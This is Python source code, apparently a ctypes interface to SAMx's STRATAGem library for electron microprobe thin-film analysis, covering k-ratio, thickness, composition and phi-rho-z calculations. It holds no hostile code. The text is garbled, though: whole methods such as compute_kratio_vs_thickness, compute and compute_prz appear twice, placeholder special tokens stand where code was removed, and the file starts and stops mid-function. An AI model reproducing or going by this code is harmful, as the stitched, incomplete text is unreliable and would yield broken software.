logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
<|reserved_special_token_0|>
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
<|reserved_special_token_0|>
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Stratagem:
<|reserved_special_token_0|>
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
<|reserved_special_token_0|>
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
<|reserved_special_token_0|>
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
key_ = self._stobjectnew(standard=True)
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error('Cannot save standard')
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
<|reserved_special_token_0|>
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
tilt_), c.byref(azimuth_)):
self._raise_error('Cannot get geometry parameters')
return toa_.value, tilt_.value, azimuth_.value
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
<|reserved_special_token_0|>
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
<|reserved_special_token_0|>
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
<|reserved_special_token_0|>
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
<|reserved_special_token_0|>
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger(__name__)
<|reserved_special_token_0|>
try:
import winreg
except ImportError:
try:
import _winreg as winreg
except ImportError:
class winreg:
HKEY_CURRENT_USER = None
class _PyHKEY(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def OpenKey(self, key, sub_key, res, sam):
return self._PyHKEY()
def QueryValueEx(self, key, value_name):
return None
<|reserved_special_token_0|>
_REGISTRY_KEY = 'Software\\SAMx\\Stratagem\\Configuration'
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
<|reserved_special_token_0|>
PRZMODE_PAP = 1
<|reserved_special_token_0|>
PRZMODE_GAU = 2
<|reserved_special_token_0|>
FLUORESCENCE_NONE = 0
<|reserved_special_token_0|>
FLUORESCENCE_LINE = 1
<|reserved_special_token_0|>
FLUORESCENCE_LINE_CONT = 2
<|reserved_special_token_0|>
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
"""
Exception raised for all errors related to the STRATAGem interface.
"""
pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def _stobjectnew(self, key=None, standard=False):
if key is None:
characters = string.ascii_lowercase
key = ''.join(random.choice(characters) for _ in range(8))
key = key.encode('ascii')
if not isinstance(key, c.c_byte):
key = c.create_string_buffer(key)
bnormal_ = c.c_bool(not standard)
iniflags_ = c.c_int(0)
logger.debug('StObjectNew(key, %r, %i)', not standard, 0)
if not self._lib.StObjectNew(key, bnormal_, iniflags_):
self._raise_error('Cannot create object')
return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear()
self._substrate = None
self._experiments.clear()
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m, layer.
mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc='Property to set/get sample')
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
